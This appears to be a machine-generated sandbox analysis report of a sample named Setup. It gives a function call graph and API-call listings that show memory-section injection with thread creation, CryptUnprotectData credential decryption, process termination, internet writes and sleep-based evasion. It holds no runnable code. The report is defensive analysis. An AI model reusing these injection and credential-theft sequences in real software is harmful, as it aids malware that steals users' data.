79138 31a742b codecvt 5 API calls 79140 3199d4c 79138->79140 79139 319990b 79141 318b460 42 API calls 79139->79141 79140->78351 79162 319993c 79141->79162 79142->79139 79430 3196d20 42 API calls 4 library calls 79142->79430 79144 3199c5e 79147 3187ff0 40 API calls 79144->79147 79145 318b220 42 API calls 79145->79144 79146 3199bde 79148 3199bed __fread_nolock 79146->79148 79437 318bab0 42 API calls 5 library calls 79146->79437 79150 3199ce1 79147->79150 79148->79144 79148->79145 79150->79151 79152 3199d52 79150->79152 79151->79138 79438 31cc0b9 40 API calls 2 library calls 79152->79438 79156 31999f6 WideCharToMultiByte 79156->79162 79157 318b460 42 API calls 79157->79162 79159 318b220 42 API calls 79159->79162 79160 3185e00 42 API calls 79160->79162 79161 3187ff0 40 API calls 79161->79162 79162->79146 79162->79156 79162->79157 79162->79159 79162->79160 79162->79161 79163 3187f30 40 API calls 79162->79163 79431 318af50 42 API calls codecvt 79162->79431 79432 319b810 79162->79432 79163->79162 79165 31761bd 79164->79165 79166 3176232 79165->79166 79440 31748f0 15 API calls 2 library calls 79165->79440 79166->78382 79168 3176225 79169 31c460e ___std_exception_destroy 14 API calls 79168->79169 79169->79166 79170 31761e8 79170->79168 79171 3176239 79170->79171 79172 31747a0 70 API calls 79170->79172 79171->78382 79172->79168 79174 319b810 42 API calls 79173->79174 79175 319b131 79174->79175 79175->78387 79177 31756e5 79176->79177 79183 31756fd 79176->79183 79178 31a742b codecvt 5 API calls 79177->79178 79180 31756f9 79178->79180 79179 3175c48 79181 31a742b codecvt 5 API calls 79179->79181 79180->78390 79182 3175c5e 79181->79182 79182->78390 79183->79179 79184 3175733 79183->79184 79185 31c460e ___std_exception_destroy 14 API calls 79183->79185 79184->79179 79186 3175757 79184->79186 79185->79184 79187 3175870 79186->79187 79190 3175761 79186->79190 79197 317577c 79187->79197 79441 3175000 79187->79441 79188 3175c27 79191 31a742b codecvt 5 API calls 79188->79191 79189 31c460e ___std_exception_destroy 14 API calls 79189->79188 79190->79197 79451 3173fc0 46 API calls codecvt 79190->79451 79193 3175c44 79191->79193 79193->78390 79195 317594c 79195->79197 79449 31c45a6 GetSystemTimeAsFileTime 79195->79449 79196 31757d5 79199 31a742b codecvt 5 API calls 79196->79199 79197->79188 79197->79189 79200 317586c 79199->79200 79200->78390 79201 31757c6 79201->79196 79201->79197 79203 31760ed 79202->79203 79204 31760da 79202->79204 79209 3176115 79203->79209 79210 317616b 79203->79210 79214 317614a 79203->79214 79205 31a742b codecvt 5 API calls 79204->79205 79206 31760e9 79205->79206 79206->78392 79207 31a742b codecvt 5 API calls 79208 3176167 79207->79208 79208->78392 79213 3176134 79209->79213 79209->79214 79211 317618c 79210->79211 79210->79214 79212 31a742b codecvt 5 API calls 79211->79212 79215 31761a0 79212->79215 79216 31a742b codecvt 5 API calls 79213->79216 79214->79207 79215->78392 79217 3176146 79216->79217 79217->78392 79219 3175c95 79218->79219 79226 3175cad 79218->79226 79220 31a742b codecvt 5 API calls 79219->79220 79221 3175ca9 79220->79221 79221->78395 79222 3176090 79223 31a742b codecvt 5 API calls 79222->79223 79225 31760ad 79223->79225 79224 31c460e ___std_exception_destroy 14 API calls 79224->79222 79225->78395 79226->79222 79226->79224 79228 318b460 42 API calls 79227->79228 79229 3178e53 79228->79229 79230 3184b60 42 API calls 79229->79230 79231 3178e63 79230->79231 79232 318fe80 42 API calls 79231->79232 79233 3178e97 79232->79233 79234 318b460 42 API calls 79233->79234 79235 3178eae 79234->79235 79236 31a71d0 48 API calls 79235->79236 79237 3178ecc 79236->79237 79238 3187ff0 40 API calls 79237->79238 79239 3178edd 79238->79239 79240 318b460 42 API calls 79239->79240 79241 3178f08 79240->79241 79242 3184b60 42 API calls 79241->79242 79243 3178f18 79242->79243 79244 3189a20 42 API calls 79243->79244 79245 3178f2b 79244->79245 79246 31a6fc0 45 API calls 79245->79246 79247 3178f39 79246->79247 79248 318b460 42 API calls 79247->79248 79249 3178f66 79248->79249 79250 3184b60 42 API calls 79249->79250 79251 3178f76 79250->79251 79252 318fe80 42 API calls 79251->79252 79253 3178faa 79252->79253 79254 318b460 42 API calls 79253->79254 79255 3178fc1 79254->79255 79256 3187ff0 40 API calls 79255->79256 79257 3178ff5 79256->79257 79258 318b460 42 API calls 79257->79258 79259 3179020 79258->79259 79260 3184b60 42 API calls 79259->79260 79261 3179030 79260->79261 79262 3189a20 42 API calls 79261->79262 79263 3179043 79262->79263 79264 31a6fc0 45 API calls 79263->79264 79265 3179051 79264->79265 79266 318b460 42 API calls 79265->79266 79267 317907f 79266->79267 79268 3184b60 42 API calls 79267->79268 79269 317908f 79268->79269 79270 3189a20 42 API calls 79269->79270 79271 31790a2 79270->79271 79272 31a6fc0 45 API calls 79271->79272 79273 31790b0 79272->79273 79274 318b460 42 API calls 79273->79274 79275 31790de 79274->79275 79276 3184b60 42 API calls 79275->79276 79277 31790ee 79276->79277 79278 3189a20 42 API calls 79277->79278 79279 3179101 79278->79279 79280 31a6fc0 45 API calls 79279->79280 79281 317910f 79280->79281 79282 318b460 42 API calls 79281->79282 79283 317913d 79282->79283 79284 3184b60 42 API calls 79283->79284 79285 317914d 79284->79285 79286 3189a20 42 API calls 79285->79286 79287 3179160 79286->79287 79288 31a6fc0 45 API calls 79287->79288 79289 317916e 79288->79289 79290 318b460 42 API calls 79289->79290 79291 317919c 79290->79291 79292 3184b60 42 API calls 79291->79292 79293 31791ac 79292->79293 79294 3189a20 42 API calls 79293->79294 79295 31791bf 79294->79295 79296 31a6fc0 45 API calls 79295->79296 79297 31791cd 79296->79297 79298 318b460 42 API calls 79297->79298 79299 31791fb 79298->79299 79300 3184b60 42 API calls 79299->79300 79301 317920b 79300->79301 79302 3189a20 42 API calls 79301->79302 79303 317921e 79302->79303 79304 31a6fc0 45 API calls 79303->79304 79305 317922c 79304->79305 79306 318b460 42 API calls 79305->79306 79307 317925a 79306->79307 79308 3184b60 42 API calls 79307->79308 79309 317926a 79308->79309 79310 3189a20 42 API calls 79309->79310 79311 317927d 79310->79311 79312 31a6fc0 45 API calls 79311->79312 79313 317928b 79312->79313 79314 31889a0 42 API calls 79313->79314 79315 31792a0 79314->79315 79316 31a742b codecvt 5 API calls 79315->79316 79317 31792b7 79316->79317 79317->78418 79318 3175670 79317->79318 79452 31750f0 79318->79452 79320 31756b6 79320->78425 79321 3175681 79321->79320 79474 31c41d0 40 API calls 2 library calls 79321->79474 79323 31756ab 79475 31c3228 67 API calls __fread_nolock 79323->79475 79326 31747bf 79325->79326 79328 317485c 79325->79328 79326->79328 79477 31c3b96 70 API calls __fread_nolock 79326->79477 79329 3173ea0 79328->79329 79330 3173ebf 79329->79330 79332 3173f55 79329->79332 79330->79332 79478 31c3b96 70 API calls __fread_nolock 79330->79478 79333 31c460e 79332->79333 79334 31d258e ___std_exception_destroy 14 API calls 79333->79334 79335 31c4626 79334->79335 79335->78418 79342 3179555 79336->79342 79337 3179850 79338 3187ff0 40 API calls 79337->79338 79339 317984c 79338->79339 79340 31a742b codecvt 5 API calls 79339->79340 79341 317987c 79340->79341 79341->78426 79342->79337 79343 3179707 79342->79343 79345 31796e1 InternetWriteFile 79342->79345 79344 3179711 InternetWriteFile 79343->79344 79349 3179737 79343->79349 79344->79337 79344->79343 79345->79337 79345->79342 79346 31797a5 OutputDebugStringA 79346->79349 79347 3179882 79479 31a755c 5 API calls std::_Locinfo::_Locinfo_dtor 79347->79479 79349->79337 79349->79346 79349->79347 79351 31797e9 79349->79351 79350 3179887 79351->79337 79352 317983a 79351->79352 79353 3187ff0 40 API calls 79352->79353 79353->79339 79354->78263 79355->78912 79356->78914 79358 318998b 79357->79358 79359 31899d5 79357->79359 79360 31899a6 79358->79360 79370 3193320 42 API calls 4 library calls 79358->79370 79371 3198470 42 API calls 79359->79371 79360->78919 79363 31899ee 79372 3192390 42 API calls codecvt 79363->79372 79365 3189a03 79366 31bf9ce Concurrency::cancel_current_task KiUserExceptionDispatcher 79365->79366 79367 3189a14 79366->79367 79368 3189920 42 API calls 79367->79368 79369 3189a52 79368->79369 79369->78919 79370->79360 79371->79363 79372->79365 79374 318d3f3 79373->79374 79375 318d4bd 79374->79375 79376 318d574 79374->79376 79377 318d3f8 codecvt 79374->79377 79382 318d51a 79375->79382 79383 318d511 79375->79383 79386 318d4ca 79375->79386 79389 318d4ea codecvt 79375->79389 79390 31768f0 42 API calls codecvt 79376->79390 79377->78928 79379 318d579 79391 3176690 42 API calls 2 library calls 79379->79391 79381 31a763e moneypunct 42 API calls 79384 318d4df 79381->79384 79385 31a763e moneypunct 42 API calls 79382->79385 79383->79379 79383->79386 79384->79389 79392 31cc0b9 40 API calls 2 library calls 79384->79392 79385->79389 79386->79381 79389->78928 79390->79379 79391->79384 79393->78950 79414 31c89c9 79394->79414 79396 31c8b5a 79402 31c8b7e 79396->79402 79422 31c9620 40 API calls 2 library calls 79396->79422 79397 31c8b27 79421 31cc02c 40 API calls 2 library calls 79397->79421 79398 31c8b12 79398->79396 79398->79397 79407 31c8b42 79398->79407 79403 31c8ba2 79402->79403 79423 31c8a06 43 API calls __Getctype 79402->79423 79404 31c8c2a 79403->79404 79424 31c8972 40 API calls 2 library calls 79403->79424 79425 31c8972 40 API calls 2 library calls 79404->79425 79407->79064 79409 31c2f4a 79408->79409 79410 31c2f61 79409->79410 79428 31c3074 40 API calls 2 library calls 79409->79428 79412 319ac82 79410->79412 79429 31c3074 40 API calls 2 library calls 79410->79429 79412->78325 79415 31c89ce 79414->79415 79416 31c89e1 79414->79416 79426 31c4593 14 API calls __dosmaperr 79415->79426 79416->79398 79418 31c89d3 79427 31cc0a9 40 API calls __fread_nolock 79418->79427 79420 31c89de 79420->79398 79421->79407 79422->79402 79423->79402 79424->79404 79425->79407 79426->79418 79427->79420 79428->79410 79429->79412 79430->79142 79431->79162 79433 319b898 79432->79433 79436 319b82a codecvt 79432->79436 79439 319b8c0 42 API calls 4 library calls 79433->79439 79435 319b8aa 79435->79162 79436->79162 79437->79148 79439->79435 79440->79170 79445 317500d __fread_nolock ___scrt_uninitialize_crt 79441->79445 79442 31750b8 79443 31a742b codecvt 5 API calls 79442->79443 79444 31750ca 79443->79444 79444->79195 79445->79442 79446 31750ce 79445->79446 79447 31a742b codecvt 5 API calls 79446->79447 79448 31750ea 79447->79448 79448->79195 79450 31c45df __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 79449->79450 79450->79201 79451->79201 79453 3175110 79452->79453 79454 31755e6 79452->79454 79453->79454 79459 317512b 79453->79459 79455 31a742b codecvt 5 API calls 79454->79455 79456 31755fc 79455->79456 79456->79321 79457 3175142 79458 31a742b codecvt 5 API calls 79457->79458 79460 3175158 79458->79460 79459->79457 79464 3175187 __fread_nolock 79459->79464 79460->79321 79461 3175573 79462 31a742b codecvt 5 API calls 79461->79462 79463 3175589 79462->79463 79463->79321 79464->79461 79466 317558d 79464->79466 79465 31755c2 79468 31a742b codecvt 5 API calls 79465->79468 79466->79465 79476 31c3a1e 69 API calls ___scrt_uninitialize_crt 79466->79476 79470 31755e2 79468->79470 79469 31755a0 79469->79465 79471 31755a8 79469->79471 79470->79321 79472 31a742b codecvt 5 API calls 79471->79472 79473 31755be 79472->79473 79473->79321 79474->79323 79475->79320 79476->79469 79477->79328 79478->79332 79479->79350 79947 31a5563 79950 31a5556 79947->79950 79949 3187f30 40 API calls 79949->79950 79950->79947 79950->79949 79951 31a563b OpenProcess 79950->79951 79952 31a5661 Process32NextW 79950->79952 79957 318af50 42 API calls codecvt 79950->79957 79951->79952 79953 31a5651 TerminateProcess CloseHandle 79951->79953 79952->79950 79954 31a5682 CloseHandle Sleep 79952->79954 79953->79952 79955 31a742b codecvt 5 API calls 79954->79955 79956 31a56b0 79955->79956 79957->79950 79958 3196b80 79959 3196b8a 79958->79959 79960 3187dc0 79958->79960 79961 3187e08 _Mpunct 79960->79961 79964 31cc0b9 40 API calls 2 library calls 79960->79964 79965 31c3472 79966 31c3495 79965->79966 79967 31c3482 79965->79967 79968 31c34a7 79966->79968 79979 31c34ba 79966->79979 80004 31c4593 14 API calls __dosmaperr 79967->80004 80006 31c4593 14 API calls __dosmaperr 79968->80006 79970 31c3487 80005 31cc0a9 40 API calls __fread_nolock 79970->80005 79973 31c34ac 80007 31cc0a9 40 API calls __fread_nolock 79973->80007 79974 31c34da 80008 31c4593 14 API calls __dosmaperr 79974->80008 79975 31c34eb 79996 31d5164 79975->79996 79979->79974 79979->79975 79982 31c3502 79983 31c36f8 79982->79983 80016 31d463f 79982->80016 80032 31cc0d6 IsProcessorFeaturePresent 79983->80032 79986 31c3702 79987 31c3514 79987->79983 80023 31d466b 79987->80023 79989 31c3526 79989->79983 79990 31c352f 79989->79990 79991 31c35b4 79990->79991 79992 31c3550 79990->79992 79995 31c3491 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 79991->79995 80031 31d51c1 40 API calls 2 library calls 79991->80031 79992->79995 80030 31d51c1 40 API calls 2 library calls 79992->80030 79998 31d5170 __FrameHandler3::FrameUnwindToState 79996->79998 79997 31c34f0 80009 31d4613 79997->80009 79998->79997 80036 31cf5b1 RtlEnterCriticalSection 79998->80036 80000 31d5181 80001 31d5195 80000->80001 80037 31d50ac 80000->80037 80049 31d51b8 RtlLeaveCriticalSection std::_Lockit::~_Lockit 80001->80049 80004->79970 80005->79995 80006->79973 80007->79995 80008->79995 80010 31d461f 80009->80010 80011 31d4634 80009->80011 80165 31c4593 14 API calls __dosmaperr 80010->80165 80011->79982 80013 31d4624 80166 31cc0a9 40 API calls __fread_nolock 80013->80166 80015 31d462f 80015->79982 80017 31d464b 80016->80017 80018 31d4660 80016->80018 80167 31c4593 14 API calls __dosmaperr 80017->80167 80018->79987 80020 31d4650 80168 31cc0a9 40 API calls __fread_nolock 80020->80168 80022 31d465b 80022->79987 80024 31d468c 80023->80024 80025 31d4677 80023->80025 80024->79989 80169 31c4593 14 API calls __dosmaperr 80025->80169 80027 31d467c 80170 31cc0a9 40 API calls __fread_nolock 80027->80170 80029 31d4687 80029->79989 80030->79995 80031->79995 80033 31cc0e2 80032->80033 80171 31cbead 80033->80171 80036->80000 80050 31d4c02 80037->80050 80040 31d5108 80119 31d4f52 80040->80119 80041 31d50ff 80059 31d4cc0 80041->80059 80044 31d5105 80045 31d258e ___std_exception_destroy 14 API calls 80044->80045 80046 31d5113 80045->80046 80047 31a742b codecvt 5 API calls 80046->80047 80048 31d5120 80047->80048 80048->80001 80049->79997 80051 31d4c21 80050->80051 80057 31d4c28 80051->80057 80151 31d3b1c 15 API calls 3 library calls 80051->80151 80053 31d4c49 80055 31d258e ___std_exception_destroy 14 API calls 80053->80055 80054 31d4c42 80054->80053 80056 31d4c6b 80054->80056 80055->80057 80058 31d258e ___std_exception_destroy 14 API calls 80056->80058 80057->80040 80057->80041 80058->80057 80060 31d4cd0 80059->80060 80061 31d466b 40 API calls 80060->80061 80062 31d4cf1 80061->80062 80063 31d4f45 80062->80063 80064 31d4613 40 API calls 80062->80064 80065 31cc0d6 __Getctype 11 API calls 80063->80065 80067 31d4d03 80064->80067 80066 31d4f51 80065->80066 80070 31d466b 40 API calls 80066->80070 80067->80063 80069 31d4d79 80067->80069 80152 31d3b1c 15 API calls 3 library calls 80067->80152 80069->80044 80072 31d4f7f 80070->80072 80071 31d4d6a 80073 31d4d7f 80071->80073 80074 31d4d71 80071->80074 80076 31d50a1 80072->80076 80079 31d4613 40 API calls 80072->80079 80075 31d258e ___std_exception_destroy 14 API calls 80073->80075 80077 31d258e ___std_exception_destroy 14 API calls 80074->80077 80078 31d4d8a 80075->80078 80080 31cc0d6 __Getctype 11 API calls 80076->80080 80077->80069 80153 31d920a 40 API calls 2 library calls 80078->80153 80081 31d4f91 80079->80081 80082 31d50ab 80080->80082 80081->80076 80084 31d463f 40 API calls 80081->80084 80085 31d4c02 15 API calls 80082->80085 80088 31d4fa3 80084->80088 80086 31d50e5 80085->80086 80089 31d5108 80086->80089 80091 31d50ff 80086->80091 80087 31d4db1 80087->80063 80098 31d4dbc __fread_nolock 80087->80098 80088->80076 80090 31d4fac 80088->80090 80092 31d4f52 45 API calls 80089->80092 80093 31d258e ___std_exception_destroy 14 API calls 80090->80093 80094 31d4cc0 45 API calls 80091->80094 80095 31d5105 80092->80095 80096 31d4fb7 GetTimeZoneInformation 80093->80096 80094->80095 80097 31d258e ___std_exception_destroy 14 API calls 80095->80097 80104 31d4fd3 __fread_nolock 80096->80104 80112 31d507b 80096->80112 80099 31d5113 80097->80099 80154 31d4c79 46 API calls 5 library calls 80098->80154 80100 31a742b codecvt 5 API calls 80099->80100 80101 31d5120 80100->80101 80101->80044 80103 31d4e01 80155 31c9713 41 API calls __fread_nolock 80103->80155 80159 31cf8e0 40 API calls __Getctype 80104->80159 80107 31d5056 80160 31d5122 46 API calls 4 library calls 80107->80160 80109 31d5067 80161 31d5122 46 API calls 4 library calls 80109->80161 80111 31d4e35 80113 31d4ec7 80111->80113 80156 31c9713 41 API calls __fread_nolock 80111->80156 80112->80044 80117 31d4f29 80113->80117 80158 31d4c79 46 API calls 5 library calls 80113->80158 80116 31d4e72 80116->80113 80157 31c9713 41 API calls __fread_nolock 80116->80157 80117->80063 80120 31d4f62 80119->80120 80121 31d466b 40 API calls 80120->80121 80122 31d4f7f 80121->80122 80123 31d50a1 80122->80123 80124 31d4613 40 API calls 80122->80124 80125 31cc0d6 __Getctype 11 API calls 80123->80125 80126 31d4f91 80124->80126 80127 31d50ab 80125->80127 80126->80123 80128 31d463f 40 API calls 80126->80128 80129 31d4c02 15 API calls 80127->80129 80131 31d4fa3 80128->80131 80130 31d50e5 80129->80130 80132 31d5108 80130->80132 80134 31d50ff 80130->80134 80131->80123 80133 31d4fac 80131->80133 80135 31d4f52 45 API calls 80132->80135 80136 31d258e ___std_exception_destroy 14 API calls 80133->80136 80137 31d4cc0 45 API calls 80134->80137 80138 31d5105 80135->80138 80139 31d4fb7 GetTimeZoneInformation 80136->80139 80137->80138 80140 31d258e ___std_exception_destroy 14 API calls 80138->80140 80144 31d507b 80139->80144 80145 31d4fd3 __fread_nolock 80139->80145 80141 31d5113 80140->80141 80142 31a742b codecvt 5 API calls 80141->80142 80143 31d5120 80142->80143 80143->80044 80144->80044 80162 31cf8e0 40 API calls __Getctype 80145->80162 80147 31d5056 80163 31d5122 46 API calls 4 library calls 80147->80163 80149 31d5067 80164 31d5122 46 API calls 4 library calls 80149->80164 80151->80054 80152->80071 80153->80087 80154->80103 80155->80111 80156->80116 80157->80113 80158->80117 80159->80107 80160->80109 80161->80112 80162->80147 80163->80149 80164->80144 80165->80013 80166->80015 80167->80020 80168->80022 80169->80027 80170->80029 80172 31cbec9 __fread_nolock std::locale::_Setgloballocale 80171->80172 80173 31cbef5 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 80172->80173 80174 31cbfc6 std::locale::_Setgloballocale 80173->80174 80175 31a742b codecvt 5 API calls 80174->80175 80176 31cbfe4 GetCurrentProcess TerminateProcess 80175->80176 80176->79986

                                                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                                                      Function 02DC1927 Relevance: 12.7, APIs: 8, Instructions: 730memorynativethreadCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 02DC19C0
                                                                                                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,00000000), ref: 02DC1A68
                                                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02DC1DDC
                                                                                                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 02DC1E91
                                                                                                                                                                                                                                                      • VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 02DC1EAE
                                                                                                                                                                                                                                                      • VirtualProtect.KERNEL32(?,?,?,00000000), ref: 02DC1F51
                                                                                                                                                                                                                                                      • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 02DC1F84
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 02DC20F5
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Virtual$ProtectSection$CreateView$AllocThread
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1248616170-0
                                                                                                                                                                                                                                                      • Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                                                                                                                                      • Instruction ID: dccda390fbd2f071829eb4281f0c930e820bc10a6b81dd90939eb67cba6562ea
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B425871608312AFDB24CF18C884B6AB7E9EF88714F24492DF9899B352D770ED45CB51
                                                                                                                                                                                                                                                      Function 031A5280 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 181memoryfilenativeCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 031A71D0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,03205040), ref: 031A7297
                                                                                                                                                                                                                                                        • Part of subcall function 0318B460: Concurrency::cancel_current_task.LIBCPMT ref: 0318B532
                                                                                                                                                                                                                                                      • NtCreateFile.NTDLL ref: 031A5433
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 031A5459
                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 031A5463
                                                                                                                                                                                                                                                      • NtReadFile.NTDLL ref: 031A5493
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FileHeap$AllocateByteCharConcurrency::cancel_current_taskCreateMultiProcessReadWide
                                                                                                                                                                                                                                                      • String ID: @$\??\
                                                                                                                                                                                                                                                      • API String ID: 1712409946-506726239
                                                                                                                                                                                                                                                      • Opcode ID: 1e87682ebac4e653913148dd98786dc147e418ac2e22002ef15604ac563f903e
                                                                                                                                                                                                                                                      • Instruction ID: 8cb7ef6c459c97163e9d451c4243f3454b13e38b861fb77ea5a28f4b03d9b1e0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1e87682ebac4e653913148dd98786dc147e418ac2e22002ef15604ac563f903e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3716A74D00348EFDB10EFA8C905BDEBBB8EF49704F204159E514AB281EB755A49CBA1
                                                                                                                                                                                                                                                      Function 0319A5A0 Relevance: 9.7, APIs: 2, Strings: 3, Instructions: 924sleepCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 612 319a5a0-319a81b call 318b460 call 3184b60 call 318fe80 call 318b460 call 31a71d0 call 3187ff0 call 318b460 call 31a6fc0 call 318b460 call 3184b60 call 318fe80 call 318b460 call 3187ff0 call 318b460 call 3184b60 call 3189a20 call 31a6fc0 call 318b460 GetNativeSystemInfo 651 319a81d-319a821 612->651 652 319a823-319a830 call 3193320 612->652 651->652 653 319a835-319a881 call 3176900 * 2 651->653 652->653 663 319a89a-319a8b5 call 318b220 653->663 664 319a883-319a88e 653->664 668 319a8b7-319ac78 call 318a730 call 3187ff0 * 3 call 3187980 call 319a120 call 319ba10 call 318b460 call 3184b60 call 31889a0 call 3187ff0 call 3199330 call 319ba10 call 318b460 call 3184b60 call 31889a0 call 3187ff0 call 3198710 call 318b460 call 3184b60 call 31889a0 call 3198710 call 318b460 call 3184b60 call 31889a0 call 3199f30 663->668 665 319a890 664->665 666 319a892-319a898 664->666 665->666 666->668 722 319ac7a 668->722 723 319ac7c-319ad55 call 31cc149 call 31889a0 call 318b460 call 3184b60 call 31889a0 call 3187ff0 call 3199d60 668->723 722->723 738 319ad59-319b1b1 call 31cc149 call 31889a0 call 318b460 call 3184b60 call 31889a0 call 3187ff0 call 3199590 call 3189ee0 call 318b460 call 3184b60 call 31889a0 call 3187ff0 call 31cc149 call 31889a0 call 318b460 call 3184b60 call 31889a0 call 3198710 call 318b460 call 3184b60 call 31889a0 call 3184c20 call 31761b0 call 318b460 call 319b760 call 3187ff0 call 31756c0 call 31760c0 call 3175c70 call 3192500 723->738 739 319ad57 723->739 800 319b24c-319b2e6 call 31bfc10 call 318b460 call 3178bf0 call 3187ff0 call 3185030 call 3178de0 738->800 801 319b1b7-319b247 call 3186050 call 318b460 call 31756c0 call 31760c0 call 3175c70 call 3187ff0 * 2 738->801 739->738 826 319b2e8-319b32d call 3175670 call 31c325f call 31bfdb0 call 31747a0 call 3173ea0 call 31c460e 800->826 827 319b335-319b38e call 318b460 call 3179500 call 3187ff0 800->827 801->800 856 319b332 826->856 842 319b3f0-319b48a call 31c460e call 3187ff0 * 3 call 31889a0 call 3187ff0 * 2 call 31a742b 827->842 843 319b390-319b3ee Sleep call 318b460 call 3179500 call 3187ff0 827->843 843->842 856->827
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 031A71D0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,03205040), ref: 031A7297
                                                                                                                                                                                                                                                        • Part of subcall function 0318B460: Concurrency::cancel_current_task.LIBCPMT ref: 0318B532
                                                                                                                                                                                                                                                      • GetNativeSystemInfo.KERNEL32(?,031F6C58,00000003,00000000), ref: 0319A80D
                                                                                                                                                                                                                                                        • Part of subcall function 03199F30: NtQuerySystemInformation.NTDLL(?,?,?,?,?,?,?,?,?,?,?,031F6BE8,00000002), ref: 0319A08C
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000BB8,?,00000000,?,?,031F6C9C,00000003,?,?,?,?,?,?,?,?,00000004), ref: 0319B395
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: System$ByteCharConcurrency::cancel_current_taskInfoInformationMultiNativeQuerySleepWide
                                                                                                                                                                                                                                                      • String ID: 1735337711$D$barni
                                                                                                                                                                                                                                                      • API String ID: 3676425750-3739948360
                                                                                                                                                                                                                                                      • Opcode ID: b98bc542e1c2090474dcec0bc49d30024d80da32ade725a76ced121807c54271
                                                                                                                                                                                                                                                      • Instruction ID: 873e9d6e94f0a48efa95836875108b835f3a7259bdbf9c6fa56ffc1e519ed2ab
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b98bc542e1c2090474dcec0bc49d30024d80da32ade725a76ced121807c54271
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 00A27974D0539CDBDB15EBA8C8447DDBBB0AF5A304F2482C9D4486B282DB745B89CF92
                                                                                                                                                                                                                                                      Function 0317BA40 Relevance: 9.4, APIs: 6, Instructions: 369memorystringencryptionCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrlen.KERNEL32(?,?,?,?), ref: 0317BC9B
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0317BCDD
                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 0317BCE7
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 0317BD30
                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 0317BD37
                                                                                                                                                                                                                                                      • CryptUnprotectData.CRYPT32 ref: 0317BDD0
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Heap$Process$AllocateCryptDataFreeUnprotectlstrlen
